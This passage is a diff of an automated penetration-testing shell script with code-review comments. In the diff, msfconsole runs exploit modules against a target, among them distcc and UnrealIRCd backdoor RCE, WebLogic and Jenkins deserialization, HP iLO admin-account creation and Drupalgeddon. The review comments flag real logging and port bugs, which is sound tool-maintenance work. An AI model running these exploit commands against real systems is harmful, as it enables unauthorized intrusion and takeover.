@@ -741,44 +755,6 @@ else fi fi -if [ -z "$port_623" ]; -then - echo -e "$OKRED + -- --=[Port 623 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET" - if [ "$AMAP" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING AMAP $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - amap $TARGET 623 -A - fi - if [ "$NMAP_SCRIPTS" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port623.txt - fi -fi - -if [ -z "$port_624" ]; -then - echo -e "$OKRED + -- --=[Port 624 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 624 opened... 
running tests...$RESET" - if [ "$AMAP" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING AMAP $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - amap $TARGET 624 -A - fi - if [ "$NMAP_SCRIPTS" = "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port624.txt - fi -fi - if [ -z "$port_1099" ]; then echo -e "$OKRED + -- --=[Port 1099 closed... skipping.$RESET" 
@@ -800,8 +776,12 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;" - msfconsole -q -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;" + msfconsole -q -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.raw > $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.raw 2> /dev/null + msfconsole -q -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.raw 2> /dev/null fi fi 
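Review bot: Both new msfconsole lines `tee` into the `.txt` file, but the `sed` that follows reads the `.raw` file, which is never created; the sed error is hidden by `2> /dev/null`, its `>` redirection truncates the `.txt` that tee just wrote, and the module output is lost. The tee targets should be `$LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_registry.raw` and `$LOOT_DIR/output/msf-$TARGET-port1099-java_rmi_server.raw`, as in every other `tee`/`sed`/`rm -f` triple in this commit. The port 3389 hunk `@@ -911,7 +891,9 @@` has the same `.txt`-vs-`.raw` mismatch for ms12_020_check. The enclosing `if` blocks start and end outside the hunk.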
@@ -864,9 +844,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3306.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3306.raw > $LOOT_DIR/output/msf-$TARGET-port3306.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port3306.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw > $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3306-mssql_ping.raw 2> /dev/null fi fi 
@@ -911,7 +891,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3389.txt + msfconsole -q -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.txt + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.raw > $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3389-ms12_020_check.raw 2> /dev/null fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING RDESKTOP CONNECTION $RESET" 
@@ -934,9 +916,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port3632.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3632.raw > $LOOT_DIR/output/msf-$TARGET-port3632.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port3632.raw 2> /dev/null + msfconsole -q -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw > $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port3632-distcc_exec.raw 2> /dev/null fi fi 
@@ -955,9 +937,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5432.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5432.raw > $LOOT_DIR/output/msf-$TARGET-port5432.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port5432.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw > $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5432-postgres_login.raw 2> /dev/null fi fi 
@@ -1001,9 +983,9 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5900.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5900.raw > $LOOT_DIR/output/msf-$TARGET-port5900.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port5900.raw 2> /dev/null + msfconsole -q -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw > $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5900-vnc_none_auth.raw 2> /dev/null fi fi 
@@ -1022,9 +1004,9 @@
 else
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984.raw > $LOOT_DIR/output/msf-$TARGET-port5984.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port5984.raw 2> /dev/null
+ msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw > $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw 2> /dev/null
 fi
 fi
@@ -1043,9 +1025,9 @@
 else
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;" | tee $LOOT_DIR/output/msf-$TARGET-port6000.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6000.raw > $LOOT_DIR/output/msf-$TARGET-port6000.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port6000.raw 2> /dev/null
+ msfconsole -q -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;" | tee $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw > $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port6000-open_x11.raw 2> /dev/null
 fi
 fi
@@ -1064,9 +1046,9 @@
 else
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port6667.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6667.raw > $LOOT_DIR/output/msf-$TARGET-port6667.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port6667.raw 2> /dev/null
+ msfconsole -q -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port6667-unreal_ircd_3281_backdoor.raw 2> /dev/null
 fi
 fi
@@ -1085,8 +1067,12 @@
 else
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING METASPLOIT MODULES $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL true; run; exit;"
- msfconsole -q -x "use exploit/linux/misc/jenkins_java_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT 7001; set SSL true; run; exit;"
+ msfconsole -q -x "use multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port7001-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
+ msfconsole -q -x "use exploit/linux/misc/jenkins_java_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT 7001; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port7001-jenkins_java_deserialize.raw 2> /dev/null
 fi
 fi
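Review bot: The new oracle_weblogic_wsat_deserialization_rce command sets no RPORT, while the jenkins_java_deserialize command right below it pins `setg RPORT 7001;`; unless that module's default happens to be 7001, the first run targets a different port from the one this block is handling, and the loot file name `port7001-...` would then be misleading. Adding `setg RPORT 7001;` to the first command makes the pair consistent and the port explicit. Both new pipelines also drop msfconsole's exit status behind `| tee`, so a failed module launch is indistinguishable from a clean run in the saved output. The enclosing else/if structure begins outside this hunk.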
@@ -1099,9 +1085,9 @@
 else
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING WEBMIN FILE DISCLOSURE EXPLOIT $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port10000.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port10000.raw > $LOOT_DIR/output/msf-$TARGET-port10000.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port10000.raw 2> /dev/null
+ msfconsole -q -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port10000-file_disclosure.raw 2> /dev/null
 fi
 fi
@@ -1110,19 +1096,13 @@
 then
 echo -e "$OKRED + -- --=[Port 16992 closed... skipping.$RESET"
 else
 echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
- if [ "$NMAP_SCRIPTS" = "1" ]; then
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port16992.txt
- fi
 if [ "$METASPLOIT_EXPLOIT" = "1" ]; then
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING INTEL AMT AUTH BYPASS EXPLOIT $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port16992.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port16992.raw > $LOOT_DIR/output/msf-$TARGET-port16992.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port16992.raw 2> /dev/null
+ msfconsole -q -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw
+ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.txt 2> /dev/null
+ rm -f $LOOT_DIR/output/msf-$TARGET-port16992-intel_amt_digest_bypass.raw 2> /dev/null
 fi
 fi
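Review bot: After this hunk the `NMAP_SCRIPTS` setting no longer has any effect on port 16992, and nothing in the remaining code records why the http-vuln-INTEL-SA-00075 nmap check was dropped; a reader comparing this port block with its neighbours will assume the branch is missing by accident. A one-line comment above the `METASPLOIT_EXPLOIT` check, such as `# Port 16992: nmap http-vuln-INTEL-SA-00075 check removed; presumably covered by the intel_amt_digest_bypass module below`, would make the decision visible to the next maintainer. The `if` that this `then` belongs to begins before the hunk.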
@@ -1200,6 +1180,7 @@
 source modes/fullportscan.sh
 source modes/bruteforce.sh
 rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
 
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED SCAN COMPLETE! $RESET"
diff --git a/modes/normal_webporthttp.sh b/modes/normal_webporthttp.sh
index 07fda6dc..243bb8e4 100644
--- a/modes/normal_webporthttp.sh
+++ b/modes/normal_webporthttp.sh
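Review bot: The added `sort -u` line redirects stderr to /dev/null twice, and because the shell opens the output file before `sort` runs, a missing `ips-all-unsorted.txt` still creates or truncates `ips-all-sorted.txt` to an empty file, silently discarding whatever an earlier run left there. Guarding on the input and quoting the paths avoids both: `[ -f "$LOOT_DIR/ips/ips-all-unsorted.txt" ] && sort -u "$LOOT_DIR/ips/ips-all-unsorted.txt" > "$LOOT_DIR/ips/ips-all-sorted.txt" 2> /dev/null`.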
@@ -108,163 +108,8 @@ if [ "$MODE" = "web" ]; then fi cd $INSTALL_DIR if [ "$METASPLOIT_EXPLOIT" == "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port80-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use 
exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.txt 2> /dev/null - rm -f 
$LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use 
exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw 2> /dev/null - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-glassfish_traversal.raw 2> /dev/null - - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "80"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw 
2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee 